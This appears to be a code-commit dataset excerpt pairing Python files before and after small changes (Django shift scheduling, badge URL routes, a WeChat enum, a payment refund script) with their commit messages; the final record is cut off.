cols.append(col_header)
return cols
Order weekday columns in watchlist | from .models import ShiftSlot, weekday_loc
from website.settings import WORKSHOP_OPEN_DAYS
def get_shift_weekview_rows():
'''Returns a dictionary of shifts for each timeslot, for each weekday'''
slots = ShiftSlot.objects.all()
if not slots:
return None
# Could be troublesome wrt. sorting of dictionary keys. Doesn't *seem* to be an issue right now but it *technically* already is!
rows = {}
for slot in slots:
row_header = '{} -\n{}'.format(slot.start.strftime('%H:%M'), slot.end.strftime('%H:%M'))
if row_header not in rows:
rows[row_header] = []
rows[row_header].append(slot)
# Sort each list in the dict by weekday
for time in rows.keys():
rows[time].sort(key=lambda slot: slot.weekday)
return rows
def get_shift_weekview_columns():
'''Returns a list of weekday name column headers to populate a weekview table with'''
slots = ShiftSlot.objects.all().order_by('weekday')
if not slots:
return None
cols = []
for slot in slots:
col_header = slot.get_weekday_name()
if col_header not in cols:
cols.append(col_header)
return cols
| <commit_before>from .models import ShiftSlot, weekday_loc
from website.settings import WORKSHOP_OPEN_DAYS
def get_shift_weekview_rows():
'''Returns a dictionary of shifts for each timeslot, for each weekday'''
slots = ShiftSlot.objects.all()
if not slots:
return None
# Could be troublesome wrt. sorting of dictionary keys. Doesn't *seem* to be an issue right now but it *technically* already is!
rows = {}
for slot in slots:
row_header = '{} -\n{}'.format(slot.start.strftime('%H:%M'), slot.end.strftime('%H:%M'))
if row_header not in rows:
rows[row_header] = []
rows[row_header].append(slot)
# Sort each list in the dict by weekday
for time in rows.keys():
rows[time].sort(key=lambda slot: slot.weekday)
return rows
def get_shift_weekview_columns():
'''Returns a list of weekday name column headers to populate a weekview table with'''
slots = ShiftSlot.objects.all()
if not slots:
return None
cols = []
for slot in slots:
col_header = slot.get_weekday_name()
if col_header not in cols:
cols.append(col_header)
return cols
<commit_msg>Order weekday columns in watchlist<commit_after> | from .models import ShiftSlot, weekday_loc
from website.settings import WORKSHOP_OPEN_DAYS
def get_shift_weekview_rows():
'''Returns a dictionary of shifts for each timeslot, for each weekday'''
slots = ShiftSlot.objects.all()
if not slots:
return None
# Could be troublesome wrt. sorting of dictionary keys. Doesn't *seem* to be an issue right now but it *technically* already is!
rows = {}
for slot in slots:
row_header = '{} -\n{}'.format(slot.start.strftime('%H:%M'), slot.end.strftime('%H:%M'))
if row_header not in rows:
rows[row_header] = []
rows[row_header].append(slot)
# Sort each list in the dict by weekday
for time in rows.keys():
rows[time].sort(key=lambda slot: slot.weekday)
return rows
def get_shift_weekview_columns():
'''Returns a list of weekday name column headers to populate a weekview table with'''
slots = ShiftSlot.objects.all().order_by('weekday')
if not slots:
return None
cols = []
for slot in slots:
col_header = slot.get_weekday_name()
if col_header not in cols:
cols.append(col_header)
return cols
| from .models import ShiftSlot, weekday_loc
from website.settings import WORKSHOP_OPEN_DAYS
def get_shift_weekview_rows():
'''Returns a dictionary of shifts for each timeslot, for each weekday'''
slots = ShiftSlot.objects.all()
if not slots:
return None
# Could be troublesome wrt. sorting of dictionary keys. Doesn't *seem* to be an issue right now but it *technically* already is!
rows = {}
for slot in slots:
row_header = '{} -\n{}'.format(slot.start.strftime('%H:%M'), slot.end.strftime('%H:%M'))
if row_header not in rows:
rows[row_header] = []
rows[row_header].append(slot)
# Sort each list in the dict by weekday
for time in rows.keys():
rows[time].sort(key=lambda slot: slot.weekday)
return rows
def get_shift_weekview_columns():
'''Returns a list of weekday name column headers to populate a weekview table with'''
slots = ShiftSlot.objects.all()
if not slots:
return None
cols = []
for slot in slots:
col_header = slot.get_weekday_name()
if col_header not in cols:
cols.append(col_header)
return cols
Order weekday columns in watchlistfrom .models import ShiftSlot, weekday_loc
from website.settings import WORKSHOP_OPEN_DAYS
def get_shift_weekview_rows():
'''Returns a dictionary of shifts for each timeslot, for each weekday'''
slots = ShiftSlot.objects.all()
if not slots:
return None
# Could be troublesome wrt. sorting of dictionary keys. Doesn't *seem* to be an issue right now but it *technically* already is!
rows = {}
for slot in slots:
row_header = '{} -\n{}'.format(slot.start.strftime('%H:%M'), slot.end.strftime('%H:%M'))
if row_header not in rows:
rows[row_header] = []
rows[row_header].append(slot)
# Sort each list in the dict by weekday
for time in rows.keys():
rows[time].sort(key=lambda slot: slot.weekday)
return rows
def get_shift_weekview_columns():
'''Returns a list of weekday name column headers to populate a weekview table with'''
slots = ShiftSlot.objects.all().order_by('weekday')
if not slots:
return None
cols = []
for slot in slots:
col_header = slot.get_weekday_name()
if col_header not in cols:
cols.append(col_header)
return cols
| <commit_before>from .models import ShiftSlot, weekday_loc
from website.settings import WORKSHOP_OPEN_DAYS
def get_shift_weekview_rows():
'''Returns a dictionary of shifts for each timeslot, for each weekday'''
slots = ShiftSlot.objects.all()
if not slots:
return None
# Could be troublesome wrt. sorting of dictionary keys. Doesn't *seem* to be an issue right now but it *technically* already is!
rows = {}
for slot in slots:
row_header = '{} -\n{}'.format(slot.start.strftime('%H:%M'), slot.end.strftime('%H:%M'))
if row_header not in rows:
rows[row_header] = []
rows[row_header].append(slot)
# Sort each list in the dict by weekday
for time in rows.keys():
rows[time].sort(key=lambda slot: slot.weekday)
return rows
def get_shift_weekview_columns():
'''Returns a list of weekday name column headers to populate a weekview table with'''
slots = ShiftSlot.objects.all()
if not slots:
return None
cols = []
for slot in slots:
col_header = slot.get_weekday_name()
if col_header not in cols:
cols.append(col_header)
return cols
<commit_msg>Order weekday columns in watchlist<commit_after>from .models import ShiftSlot, weekday_loc
from website.settings import WORKSHOP_OPEN_DAYS
def get_shift_weekview_rows():
'''Returns a dictionary of shifts for each timeslot, for each weekday'''
slots = ShiftSlot.objects.all()
if not slots:
return None
# Could be troublesome wrt. sorting of dictionary keys. Doesn't *seem* to be an issue right now but it *technically* already is!
rows = {}
for slot in slots:
row_header = '{} -\n{}'.format(slot.start.strftime('%H:%M'), slot.end.strftime('%H:%M'))
if row_header not in rows:
rows[row_header] = []
rows[row_header].append(slot)
# Sort each list in the dict by weekday
for time in rows.keys():
rows[time].sort(key=lambda slot: slot.weekday)
return rows
def get_shift_weekview_columns():
'''Returns a list of weekday name column headers to populate a weekview table with'''
slots = ShiftSlot.objects.all().order_by('weekday')
if not slots:
return None
cols = []
for slot in slots:
col_header = slot.get_weekday_name()
if col_header not in cols:
cols.append(col_header)
return cols
|
8db252d2980451a3c2107df64c4438de44781eea | frigg/projects/urls.py | frigg/projects/urls.py | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^projects/approve/$', views.approve_projects, name='approve_projects_overview'),
url(r'^projects/approve/(?P<project_id>\d+)/$', views.approve_projects, name='approve_project'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+).svg$', views.build_badge, name='build_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/coverage.svg$', views.coverage_badge,
name='coverage_badge'),
]
| from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^projects/approve/$', views.approve_projects, name='approve_projects_overview'),
url(r'^projects/approve/(?P<project_id>\d+)/$', views.approve_projects, name='approve_project'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+).svg$', views.build_badge, name='build_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/(?P<branch>[^/]+).svg$', views.build_badge,
name='build_branch_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/coverage.svg$', views.coverage_badge,
name='coverage_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/(?P<branch>[^/]+)/coverage.svg$', views.coverage_badge,
name='coverage_branch_badge'),
]
| Add support for specifying branch name to svg badges | Add support for specifying branch name to svg badges
| Python | mit | frigg/frigg-hq,frigg/frigg-hq,frigg/frigg-hq | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^projects/approve/$', views.approve_projects, name='approve_projects_overview'),
url(r'^projects/approve/(?P<project_id>\d+)/$', views.approve_projects, name='approve_project'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+).svg$', views.build_badge, name='build_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/coverage.svg$', views.coverage_badge,
name='coverage_badge'),
]
Add support for specifying branch name to svg badges | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^projects/approve/$', views.approve_projects, name='approve_projects_overview'),
url(r'^projects/approve/(?P<project_id>\d+)/$', views.approve_projects, name='approve_project'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+).svg$', views.build_badge, name='build_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/(?P<branch>[^/]+).svg$', views.build_badge,
name='build_branch_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/coverage.svg$', views.coverage_badge,
name='coverage_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/(?P<branch>[^/]+)/coverage.svg$', views.coverage_badge,
name='coverage_branch_badge'),
]
| <commit_before>from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^projects/approve/$', views.approve_projects, name='approve_projects_overview'),
url(r'^projects/approve/(?P<project_id>\d+)/$', views.approve_projects, name='approve_project'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+).svg$', views.build_badge, name='build_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/coverage.svg$', views.coverage_badge,
name='coverage_badge'),
]
<commit_msg>Add support for specifying branch name to svg badges<commit_after> | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^projects/approve/$', views.approve_projects, name='approve_projects_overview'),
url(r'^projects/approve/(?P<project_id>\d+)/$', views.approve_projects, name='approve_project'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+).svg$', views.build_badge, name='build_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/(?P<branch>[^/]+).svg$', views.build_badge,
name='build_branch_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/coverage.svg$', views.coverage_badge,
name='coverage_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/(?P<branch>[^/]+)/coverage.svg$', views.coverage_badge,
name='coverage_branch_badge'),
]
| from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^projects/approve/$', views.approve_projects, name='approve_projects_overview'),
url(r'^projects/approve/(?P<project_id>\d+)/$', views.approve_projects, name='approve_project'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+).svg$', views.build_badge, name='build_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/coverage.svg$', views.coverage_badge,
name='coverage_badge'),
]
Add support for specifying branch name to svg badgesfrom django.conf.urls import url
from . import views
urlpatterns = [
url(r'^projects/approve/$', views.approve_projects, name='approve_projects_overview'),
url(r'^projects/approve/(?P<project_id>\d+)/$', views.approve_projects, name='approve_project'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+).svg$', views.build_badge, name='build_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/(?P<branch>[^/]+).svg$', views.build_badge,
name='build_branch_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/coverage.svg$', views.coverage_badge,
name='coverage_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/(?P<branch>[^/]+)/coverage.svg$', views.coverage_badge,
name='coverage_branch_badge'),
]
| <commit_before>from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^projects/approve/$', views.approve_projects, name='approve_projects_overview'),
url(r'^projects/approve/(?P<project_id>\d+)/$', views.approve_projects, name='approve_project'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+).svg$', views.build_badge, name='build_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/coverage.svg$', views.coverage_badge,
name='coverage_badge'),
]
<commit_msg>Add support for specifying branch name to svg badges<commit_after>from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^projects/approve/$', views.approve_projects, name='approve_projects_overview'),
url(r'^projects/approve/(?P<project_id>\d+)/$', views.approve_projects, name='approve_project'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+).svg$', views.build_badge, name='build_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/(?P<branch>[^/]+).svg$', views.build_badge,
name='build_branch_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/coverage.svg$', views.coverage_badge,
name='coverage_badge'),
url(r'^(?P<owner>[^/]+)/(?P<name>[^/]+)/(?P<branch>[^/]+)/coverage.svg$', views.coverage_badge,
name='coverage_branch_badge'),
]
|
9261db252969c69ede633d4a4c02bb87c7bc1434 | quilt/__init__.py | quilt/__init__.py | # vim: fileencoding=utf-8 et sw=4 ts=4 tw=80:
# python-quilt - A Python implementation of the quilt patch system
#
# Copyright (C) 2012 Björn Ricks <bjoern.ricks@googlemail.com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
__version_info__ = ("0", "1", "dev1")
__version__ = '.'.join(__version_info__)
| # vim: fileencoding=utf-8 et sw=4 ts=4 tw=80:
# python-quilt - A Python implementation of the quilt patch system
#
# Copyright (C) 2012 Björn Ricks <bjoern.ricks@googlemail.com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
""" A python implementation of quilt """
__version_info__ = ("0", "1", "dev1")
__version__ = '.'.join(__version_info__)
| Add docstring for main module | Add docstring for main module
| Python | mit | bjoernricks/python-quilt,vadmium/python-quilt | # vim: fileencoding=utf-8 et sw=4 ts=4 tw=80:
# python-quilt - A Python implementation of the quilt patch system
#
# Copyright (C) 2012 Björn Ricks <bjoern.ricks@googlemail.com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
__version_info__ = ("0", "1", "dev1")
__version__ = '.'.join(__version_info__)
Add docstring for main module | # vim: fileencoding=utf-8 et sw=4 ts=4 tw=80:
# python-quilt - A Python implementation of the quilt patch system
#
# Copyright (C) 2012 Björn Ricks <bjoern.ricks@googlemail.com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
""" A python implementation of quilt """
__version_info__ = ("0", "1", "dev1")
__version__ = '.'.join(__version_info__)
| <commit_before># vim: fileencoding=utf-8 et sw=4 ts=4 tw=80:
# python-quilt - A Python implementation of the quilt patch system
#
# Copyright (C) 2012 Björn Ricks <bjoern.ricks@googlemail.com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
__version_info__ = ("0", "1", "dev1")
__version__ = '.'.join(__version_info__)
<commit_msg>Add docstring for main module<commit_after> | # vim: fileencoding=utf-8 et sw=4 ts=4 tw=80:
# python-quilt - A Python implementation of the quilt patch system
#
# Copyright (C) 2012 Björn Ricks <bjoern.ricks@googlemail.com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
""" A python implementation of quilt """
__version_info__ = ("0", "1", "dev1")
__version__ = '.'.join(__version_info__)
| # vim: fileencoding=utf-8 et sw=4 ts=4 tw=80:
# python-quilt - A Python implementation of the quilt patch system
#
# Copyright (C) 2012 Björn Ricks <bjoern.ricks@googlemail.com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
__version_info__ = ("0", "1", "dev1")
__version__ = '.'.join(__version_info__)
Add docstring for main module# vim: fileencoding=utf-8 et sw=4 ts=4 tw=80:
# python-quilt - A Python implementation of the quilt patch system
#
# Copyright (C) 2012 Björn Ricks <bjoern.ricks@googlemail.com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
""" A python implementation of quilt """
__version_info__ = ("0", "1", "dev1")
__version__ = '.'.join(__version_info__)
| <commit_before># vim: fileencoding=utf-8 et sw=4 ts=4 tw=80:
# python-quilt - A Python implementation of the quilt patch system
#
# Copyright (C) 2012 Björn Ricks <bjoern.ricks@googlemail.com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
__version_info__ = ("0", "1", "dev1")
__version__ = '.'.join(__version_info__)
<commit_msg>Add docstring for main module<commit_after># vim: fileencoding=utf-8 et sw=4 ts=4 tw=80:
# python-quilt - A Python implementation of the quilt patch system
#
# Copyright (C) 2012 Björn Ricks <bjoern.ricks@googlemail.com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
""" A python implementation of quilt """
__version_info__ = ("0", "1", "dev1")
__version__ = '.'.join(__version_info__)
|
17b3ea3fb2af48aa7680b339bb83cba15f842a83 | classes/wechatMessageType.py | classes/wechatMessageType.py | from enum import Enum
class WechatMessageType(Enum):
TEXT = 1
SYSTEM_MESSAGE = 10000
VOICE = 34
EMOTION = 47
VIDEO = 62
CALL = 50
PICTURE = 3
POSITION = 48
CARD = 42
LINK = 49
UNHANDLED = -999 | from enum import Enum
class WechatMessageType(Enum):
TEXT = 1
SYSTEM_MESSAGE = 10000
VOICE = 34
VIDEO1 = 43
EMOTION = 47
VIDEO2 = 62
CALL = 50
PICTURE = 3
POSITION = 48
CARD = 42
LINK = 49
UNHANDLED = -999 | Support wechat message type 43 | Support wechat message type 43
| Python | apache-2.0 | jambus/wechat-analysis | from enum import Enum
class WechatMessageType(Enum):
TEXT = 1
SYSTEM_MESSAGE = 10000
VOICE = 34
EMOTION = 47
VIDEO = 62
CALL = 50
PICTURE = 3
POSITION = 48
CARD = 42
LINK = 49
UNHANDLED = -999Support wechat message type 43 | from enum import Enum
class WechatMessageType(Enum):
TEXT = 1
SYSTEM_MESSAGE = 10000
VOICE = 34
VIDEO1 = 43
EMOTION = 47
VIDEO2 = 62
CALL = 50
PICTURE = 3
POSITION = 48
CARD = 42
LINK = 49
UNHANDLED = -999 | <commit_before>from enum import Enum
class WechatMessageType(Enum):
TEXT = 1
SYSTEM_MESSAGE = 10000
VOICE = 34
EMOTION = 47
VIDEO = 62
CALL = 50
PICTURE = 3
POSITION = 48
CARD = 42
LINK = 49
UNHANDLED = -999<commit_msg>Support wechat message type 43<commit_after> | from enum import Enum
class WechatMessageType(Enum):
TEXT = 1
SYSTEM_MESSAGE = 10000
VOICE = 34
VIDEO1 = 43
EMOTION = 47
VIDEO2 = 62
CALL = 50
PICTURE = 3
POSITION = 48
CARD = 42
LINK = 49
UNHANDLED = -999 | from enum import Enum
class WechatMessageType(Enum):
TEXT = 1
SYSTEM_MESSAGE = 10000
VOICE = 34
EMOTION = 47
VIDEO = 62
CALL = 50
PICTURE = 3
POSITION = 48
CARD = 42
LINK = 49
UNHANDLED = -999Support wechat message type 43from enum import Enum
class WechatMessageType(Enum):
TEXT = 1
SYSTEM_MESSAGE = 10000
VOICE = 34
VIDEO1 = 43
EMOTION = 47
VIDEO2 = 62
CALL = 50
PICTURE = 3
POSITION = 48
CARD = 42
LINK = 49
UNHANDLED = -999 | <commit_before>from enum import Enum
class WechatMessageType(Enum):
TEXT = 1
SYSTEM_MESSAGE = 10000
VOICE = 34
EMOTION = 47
VIDEO = 62
CALL = 50
PICTURE = 3
POSITION = 48
CARD = 42
LINK = 49
UNHANDLED = -999<commit_msg>Support wechat message type 43<commit_after>from enum import Enum
class WechatMessageType(Enum):
TEXT = 1
SYSTEM_MESSAGE = 10000
VOICE = 34
VIDEO1 = 43
EMOTION = 47
VIDEO2 = 62
CALL = 50
PICTURE = 3
POSITION = 48
CARD = 42
LINK = 49
UNHANDLED = -999 |
a7c1ec51aca74785ac309618f9519d4592953d3f | pydispatch/__init__.py | pydispatch/__init__.py | import pkg_resources
try:
__version__ = pkg_resources.require('python-dispatch')[0].version
except: # pragma: no cover
__version__ = 'unknown'
from pydispatch.dispatch import Dispatcher
from pydispatch.properties import *
| import pkg_resources
try:
__version__ = pkg_resources.require('python-dispatch')[0].version
except: # pragma: no cover
__version__ = 'unknown'
from pydispatch.dispatch import Dispatcher, Event
from pydispatch.properties import *
| Make Event object available at root level import | Make Event object available at root level import
| Python | mit | nocarryr/python-dispatch | import pkg_resources
try:
__version__ = pkg_resources.require('python-dispatch')[0].version
except: # pragma: no cover
__version__ = 'unknown'
from pydispatch.dispatch import Dispatcher
from pydispatch.properties import *
Make Event object available at root level import | import pkg_resources
try:
__version__ = pkg_resources.require('python-dispatch')[0].version
except: # pragma: no cover
__version__ = 'unknown'
from pydispatch.dispatch import Dispatcher, Event
from pydispatch.properties import *
| <commit_before>import pkg_resources
try:
__version__ = pkg_resources.require('python-dispatch')[0].version
except: # pragma: no cover
__version__ = 'unknown'
from pydispatch.dispatch import Dispatcher
from pydispatch.properties import *
<commit_msg>Make Event object available at root level import<commit_after> | import pkg_resources
try:
__version__ = pkg_resources.require('python-dispatch')[0].version
except: # pragma: no cover
__version__ = 'unknown'
from pydispatch.dispatch import Dispatcher, Event
from pydispatch.properties import *
| import pkg_resources
try:
__version__ = pkg_resources.require('python-dispatch')[0].version
except: # pragma: no cover
__version__ = 'unknown'
from pydispatch.dispatch import Dispatcher
from pydispatch.properties import *
Make Event object available at root level importimport pkg_resources
try:
__version__ = pkg_resources.require('python-dispatch')[0].version
except: # pragma: no cover
__version__ = 'unknown'
from pydispatch.dispatch import Dispatcher, Event
from pydispatch.properties import *
| <commit_before>import pkg_resources
try:
__version__ = pkg_resources.require('python-dispatch')[0].version
except: # pragma: no cover
__version__ = 'unknown'
from pydispatch.dispatch import Dispatcher
from pydispatch.properties import *
<commit_msg>Make Event object available at root level import<commit_after>import pkg_resources
try:
__version__ = pkg_resources.require('python-dispatch')[0].version
except: # pragma: no cover
__version__ = 'unknown'
from pydispatch.dispatch import Dispatcher, Event
from pydispatch.properties import *
|
3c4a9c08858378624600a3f64616f03e29d21f31 | actually-do-refunds.py | actually-do-refunds.py | #!/usr/bin/env python -u
from __future__ import absolute_import, division, print_function, unicode_literals
import csv, os, requests
url = 'https://api.balancedpayments.com/debits/{}/refunds'
balanced_api_secret = os.environ['BALANCED_API_SECRET']
inp = csv.reader(open('refunds.csv'))
out = csv.writer(open('refunds.completed.csv', 'w+'))
for ts, id, amount, username, route_id in inp:
response = requests.post( url.format(id)
, data={'amount': amount}
, auth=(balanced_api_secret, '')
)
out.writerow((ts,id,amount,username,route_id,response.status_code,response.content))
| #!/usr/bin/env python -u
from __future__ import absolute_import, division, print_function, unicode_literals
from gratipay.billing.payday import threaded_map
import csv, os, requests
import threading
url = 'https://api.balancedpayments.com/debits/{}/refunds'
balanced_api_secret = os.environ['BALANCED_API_SECRET']
inp = csv.reader(open('refunds.csv'))
out = csv.writer(open('refunds.completed.csv', 'w+'))
writelock = threading.Lock()
def refund(row):
ts, id, amount, username, route_id = row
response = requests.post( url.format(id)
, data={'amount': amount}
, auth=(balanced_api_secret, '')
)
writelock.acquire()
try:
out.writerow((ts,id,amount,username,route_id,response.status_code,response.content))
finally:
writelock.release()
return
threaded_map(refund, inp)
| Use threaded_map to speed up refunds | Use threaded_map to speed up refunds
| Python | mit | gratipay/gratipay.com,gratipay/gratipay.com,gratipay/gratipay.com,gratipay/gratipay.com | #!/usr/bin/env python -u
from __future__ import absolute_import, division, print_function, unicode_literals
import csv, os, requests
url = 'https://api.balancedpayments.com/debits/{}/refunds'
balanced_api_secret = os.environ['BALANCED_API_SECRET']
inp = csv.reader(open('refunds.csv'))
out = csv.writer(open('refunds.completed.csv', 'w+'))
for ts, id, amount, username, route_id in inp:
response = requests.post( url.format(id)
, data={'amount': amount}
, auth=(balanced_api_secret, '')
)
out.writerow((ts,id,amount,username,route_id,response.status_code,response.content))
Use threaded_map to speed up refunds | #!/usr/bin/env python -u
from __future__ import absolute_import, division, print_function, unicode_literals
from gratipay.billing.payday import threaded_map
import csv, os, requests
import threading
url = 'https://api.balancedpayments.com/debits/{}/refunds'
balanced_api_secret = os.environ['BALANCED_API_SECRET']
inp = csv.reader(open('refunds.csv'))
out = csv.writer(open('refunds.completed.csv', 'w+'))
writelock = threading.Lock()
def refund(row):
ts, id, amount, username, route_id = row
response = requests.post( url.format(id)
, data={'amount': amount}
, auth=(balanced_api_secret, '')
)
writelock.acquire()
try:
out.writerow((ts,id,amount,username,route_id,response.status_code,response.content))
finally:
writelock.release()
return
threaded_map(refund, inp)
| <commit_before>#!/usr/bin/env python -u
from __future__ import absolute_import, division, print_function, unicode_literals
import csv, os, requests
url = 'https://api.balancedpayments.com/debits/{}/refunds'
balanced_api_secret = os.environ['BALANCED_API_SECRET']
inp = csv.reader(open('refunds.csv'))
out = csv.writer(open('refunds.completed.csv', 'w+'))
for ts, id, amount, username, route_id in inp:
response = requests.post( url.format(id)
, data={'amount': amount}
, auth=(balanced_api_secret, '')
)
out.writerow((ts,id,amount,username,route_id,response.status_code,response.content))
<commit_msg>Use threaded_map to speed up refunds<commit_after> | #!/usr/bin/env python -u
from __future__ import absolute_import, division, print_function, unicode_literals
from gratipay.billing.payday import threaded_map
import csv, os, requests
import threading
url = 'https://api.balancedpayments.com/debits/{}/refunds'
balanced_api_secret = os.environ['BALANCED_API_SECRET']
inp = csv.reader(open('refunds.csv'))
out = csv.writer(open('refunds.completed.csv', 'w+'))
writelock = threading.Lock()
def refund(row):
ts, id, amount, username, route_id = row
response = requests.post( url.format(id)
, data={'amount': amount}
, auth=(balanced_api_secret, '')
)
writelock.acquire()
try:
out.writerow((ts,id,amount,username,route_id,response.status_code,response.content))
finally:
writelock.release()
return
threaded_map(refund, inp)
| #!/usr/bin/env python -u
from __future__ import absolute_import, division, print_function, unicode_literals
